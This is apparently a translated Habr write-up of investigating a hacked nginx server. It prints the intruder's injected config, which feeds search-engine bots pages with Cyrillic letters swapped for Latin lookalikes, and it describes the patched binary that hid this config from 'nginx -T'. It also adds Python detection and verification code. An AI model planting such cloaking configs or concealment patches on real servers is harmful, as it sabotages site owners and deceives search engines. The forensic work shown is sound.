When 'а' is not equal to 'a'. Around a hack

A not very pleasant story happened to a friend of mine. But although it turned out unpleasant for Mikhail, it was quite entertaining for me.

I must say that my friend is a reasonably decent UNIX user: he can install MySQL and php himself and do simple nginx settings.
And he has a dozen or so websites dedicated to construction tools.

One of these sites, dedicated to chainsaws, sits firmly in the TOP of the search engines. The site is a non-commercial review site, but someone has made a habit of attacking it. Now DDoS, now brute force, now abusive comments and complaints sent to the hoster and to RKN (Roskomnadzor).
Suddenly everything calmed down, and this calm turned out not to be for the better: the site began to slide slowly down from the top lines of the search results.


That was the preamble; now to the admin story itself.

It was close to bedtime when the phone rang: “San, could you take a look at my server? It seems to me that I've been hacked; I can't prove it, but the feeling hasn't left me for the third week now. Maybe it's time for me to get treated for paranoia?”

What followed was a half-hour conversation that can be summarized as follows:

  • the ground for a hack was quite fertile;
  • an attacker could have obtained superuser rights;
  • the attack (if it did happen) was aimed specifically at this site;
  • the problem areas have been fixed and all that remains is to understand whether there was an intrusion;
  • the hack could not have affected the site code and the database.

Regarding the last point.


Only the frontend's white (public) IP is visible to the world. There is no exchange between the backends and the frontend other than http(s); users/passwords are different, no keys are shared. Gray (private) addresses, all ports except 80/443 are closed. The backends' white IPs are known only to two users, whom Mikhail trusts completely.

The frontend runs Debian 9, and by the time of the call the system had been cut off from the world by an external firewall and stopped.

“Okay, give me access,” I decided to postpone sleep for an hour. “I'll see with my own eyes.”

Here and further on:

$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1

Looking for a possible hack

I start the server, first in rescue mode. I mount the disks and leaf through auth logs, history, system logs and so on; where possible I check file creation dates, although I understand that a normal intruder would have "cleaned up" after himself, and Misha had already "trampled" around a lot while searching on his own.

I boot in normal mode and, still not quite understanding what I'm looking for, study the configs. First of all I'm interested in nginx, since in general there is nothing else on the frontend but it.
The configs are small, neatly split into a dozen files; I simply look through them one by one with cat. Everything looks clean, but you never know whether I missed some include, so let me do a full listing:

$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful

I didn't get it: "Where's the listing?"

$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module

A second question is added to the question about the listing: "Why such an old nginx version?"

Moreover, the system believes that the latest version is installed:

$ dpkg -l nginx | grep "[n]ginx"
ii  nginx          1.14.2-2+deb10u1 all          small, powerful, scalable web/proxy server

I call:
- Misha, why did you rebuild nginx?
- Wait, I don't even know how to do that!
- Okay, go to sleep...

nginx has been rebuilt, and the listing output of "-T" is hidden for a reason. There is no longer any doubt about the hack; one could simply accept it and (since Misha had replaced the server with a new one anyway) consider the problem solved.
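The two observations above (the binary reports one version, the package manager another, and the binary on disk no longer matches what the package installed) can be turned into a check. This is an added example, not code from the original article; the sample `nginx -v`, `dpkg -l` and `dpkg -V` outputs are constructed here, modelled on the page and on dpkg's rpm-style verify format, and the function names are mine.

```python
import re

# Constructed sample outputs, modelled on the page (not captured from the real server).
# Note: `nginx -v` writes to stderr, so capture it with 2>&1.
NGINX_V_OUTPUT = "nginx version: nginx/1.10.3"
DPKG_L_OUTPUT = (
    "ii  nginx          1.14.2-2+deb10u1 all          "
    "small, powerful, scalable web/proxy server"
)
# `dpkg -V nginx` (dpkg --verify) prints one rpm-style line per changed file:
# nine flag characters ('5' in the third position means the md5sum differs),
# a 'c' if the file is a conffile, then the path. Constructed sample:
DPKG_VERIFY_OUTPUT = """\
??5??????   /usr/sbin/nginx
??5?????? c /etc/nginx/nginx.conf
"""


def upstream_from_debian_version(version):
    """Reduce a Debian version ([epoch:]upstream[-revision]) to its upstream part."""
    if ":" in version:
        version = version.split(":", 1)[1]
    if "-" in version:
        version = version.rsplit("-", 1)[0]
    return version


def binary_version(nginx_v_text):
    """Version the binary on PATH reports about itself, or None."""
    m = re.search(r"nginx/(\d+(?:\.\d+)+)", nginx_v_text)
    return m.group(1) if m else None


def package_version(dpkg_l_text, package="nginx"):
    """Upstream version of the package dpkg believes is installed, or None."""
    for line in dpkg_l_text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0] == "ii" and parts[1] == package:
            return upstream_from_debian_version(parts[2])
    return None


def build_mismatch(nginx_v_text, dpkg_l_text):
    """Flag a binary that does not report the packaged version."""
    binary = binary_version(nginx_v_text)
    packaged = package_version(dpkg_l_text)
    return {"binary": binary, "package": packaged,
            "mismatch": binary is None or binary != packaged}


def modified_non_conffiles(dpkg_verify_text):
    """Paths whose md5sum differs from the package manifest, ignoring conffiles
    (an edited /etc/nginx/nginx.conf is expected; an edited /usr/sbin/nginx is not)."""
    hits = []
    for line in dpkg_verify_text.splitlines():
        if len(line) < 11:
            continue
        flags, rest = line[:9], line[9:].strip()
        is_conffile = rest.startswith("c ")
        path = rest[2:].strip() if is_conffile else rest
        if "5" in flags and not is_conffile:
            hits.append(path)
    return hits


if __name__ == "__main__":
    print(build_mismatch(NGINX_V_OUTPUT, DPKG_L_OUTPUT))
    print(modified_non_conffiles(DPKG_VERIFY_OUTPUT))
```

Two caveats when running this for real: an intruder with root can also rewrite /var/lib/dpkg/info/nginx.md5sums, so a clean `dpkg -V` proves little on its own; compare against a freshly downloaded .deb, and check that the nginx found on PATH is the file the package owns (`dpkg -S "$(command -v nginx)"`), because a rebuilt binary dropped into /usr/local/sbin shadows the packaged one.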

And indeed, since someone has obtained root rights, the only sensible thing is to reinstall the system, and looking for what exactly was wrong there was pointless, but this time curiosity won over sleep. How can we find out what they wanted to hide from us?

Let's try tracing:

$ strace nginx -T

Looking at it, it is obvious that the trace lacks lines like

write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf)   = 21
write(1, "...
write(1, "n", 1

Just for fun, let's compare the results.

$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264

I guess the code fragment in src/core/nginx.c

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 1;
                break;

was brought to the form:

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                //ngx_dump_config = 1;
                break;

or

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 0;
                break;

so the "-T" listing is not output.

But how do we look at our config?

If my guess is right and the problem is only in the ngx_dump_config variable, let's try to set it with gdb; fortunately the build has the --with-cc-opt='-g ...' flag, and let's hope the -O2 optimization doesn't ruin things. At the same time, since I don't know what else might be done with ngx_dump_config inside case 'T':, we won't go through that block but set the variable via case 't':

Why '-t' can be used instead of '-T': the if (ngx_dump_config) handling happens inside if (ngx_test_config):

    if (ngx_test_config) {
        if (!ngx_quiet_mode) {
            ngx_log_stderr(0, "configuration file %s test is successful",
                           cycle->conf_file.data);
        }

        if (ngx_dump_config) {
            cd = cycle->config_dump.elts;

            for (i = 0; i < cycle->config_dump.nelts; i++) {

                ngx_write_stdout("# configuration file ");
                (void) ngx_write_fd(ngx_stdout, cd[i].name.data,
                                    cd[i].name.len);
                ngx_write_stdout(":" NGX_LINEFEED);

                b = cd[i].buffer;

                (void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
                ngx_write_stdout(NGX_LINEFEED);
            }
        }

        return 0;
    }

True, if the code had been changed in this section rather than in case 'T':, my method wouldn't work.

Checking nginx.conf

Having already solved the problem, it turned out during testing that a minimal nginx configuration of the following form is enough for the malware to work:

events {
}

http {
	include /etc/nginx/sites-enabled/*;
}

We'll use it in the article for brevity.

Start the debugger

$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188     src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}

http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

        include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:

[Inferior 1 (process 32581) exited normally]
(gdb) quit

Steps:

  • set a breakpoint in main()
  • start the program
  • change the value of the variable that controls the config dump: ngx_dump_config=1
  • continue/finish the program

As you can see, the real configuration differs from ours; we extract the parasitic fragment from it:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

Let's look at what happens here in order.

The User-Agents of yandex/google are identified:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

WordPress service pages are excluded:

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

And for those who fall under both conditions above

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

in the text of HTML pages the Cyrillic 'о' is replaced with the Latin 'o' and the Cyrillic 'а' with the Latin 'a':

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

That's right, the whole subtlety is that 'а' (U+0430) != 'a' (U+0061), just as 'о' (U+043E) != 'o' (U+006F).

So search engine bots get, instead of normal 100% Cyrillic text, altered garbage diluted with the Latin 'a' and 'o'. I won't presume to say exactly how this affects SEO, but such a mishmash of letters is unlikely to have a positive effect on positions in the search results.
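To make the trick concrete, here is the parasitic config rewritten as a small Python model, together with the check a site owner can run over a page body to catch it. This is an added example, not part of the original article or of nginx; `sign_user_agent`, `sign_uri`, `cloak`, `mixed_script_words` and `demo` are names I chose, and the sample HTML and User-Agent strings are constructed.

```python
import re

# The code points behind the trick: the glyphs look identical but compare unequal.
CYR_A, LAT_A = "\u0430", "a"   # Cyrillic small a vs Latin a
CYR_O, LAT_O = "\u043e", "o"   # Cyrillic small o vs Latin o

# The two "map" blocks from the config. nginx "~*" means a case-insensitive regex.
BOT_UA = re.compile(r"yandex.com/bots|www.google.com/bot.html", re.I)
WP_URI = re.compile(r"/wp-", re.I)


def sign_user_agent(user_agent):
    return 1 if BOT_UA.search(user_agent or "") else 0


def sign_uri(uri):
    return 1 if WP_URI.search(uri or "") else 0


def cloak(html, user_agent, uri):
    """Model of the two remaining maps plus the sub_filter directives.

    $sign_o / $sign_a become the Latin letter only for the key 'о:1:0' / 'а:1:0',
    i.e. a search-engine bot requesting a non-/wp- URI; for everyone else the map
    default returns the original Cyrillic letter, so the page is untouched.
    sub_filter_once off makes nginx replace every occurrence, not only the first.
    nginx lowercases only ASCII bytes when matching, so uppercase Cyrillic А/О
    are left alone, as they are here.
    """
    if sign_user_agent(user_agent) == 1 and sign_uri(uri) == 0:
        return html.replace(CYR_O, LAT_O).replace(CYR_A, LAT_A)
    return html


WORD = re.compile(r"[^\W\d_]+")


def mixed_script_words(text):
    """Words containing both Cyrillic and basic-Latin letters: the fingerprint the
    cloaked output leaves behind, and something a clean Russian page never has."""
    hits = []
    for word in WORD.findall(text):
        has_cyr = any("\u0400" <= ch <= "\u04ff" for ch in word)
        has_lat = any("a" <= ch.lower() <= "z" for ch in word)
        if has_cyr and has_lat:
            hits.append(word)
    return hits


# Constructed sample page body and clients, not taken from the real site.
SAMPLE_HTML = "<p>Бензопила для дома: обзор и выбор</p>"
GOOGLEBOT = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER = "Mozilla/5.0 (X11; Linux x86_64) Firefox/78.0"


def demo():
    """What the bot sees versus what a visitor sees, and the detector's verdict."""
    for_bot = cloak(SAMPLE_HTML, GOOGLEBOT, "/saws/")
    for_human = cloak(SAMPLE_HTML, BROWSER, "/saws/")
    return {
        "bot_sees": for_bot,
        "human_sees": for_human,
        "differs": for_bot != for_human,
        "suspicious_words": mixed_script_words(for_bot),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

To reproduce the check against a live site, fetch the same URL twice, once with a normal browser User-Agent and once with a bot one, and run mixed_script_words over both bodies; send `Accept-Encoding: identity`, because the real sub_filter only rewrites uncompressed responses whose Content-Type matches sub_filter_types (text/html by default).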

What can I say, inventive guys.

Links

Debugging with GDB
gdb(1) - Linux man page
strace(1) - Linux man page
Nginx - Module ngx_http_sub_module
About saws, chainsaws and electric saws

Source: www.habr.com
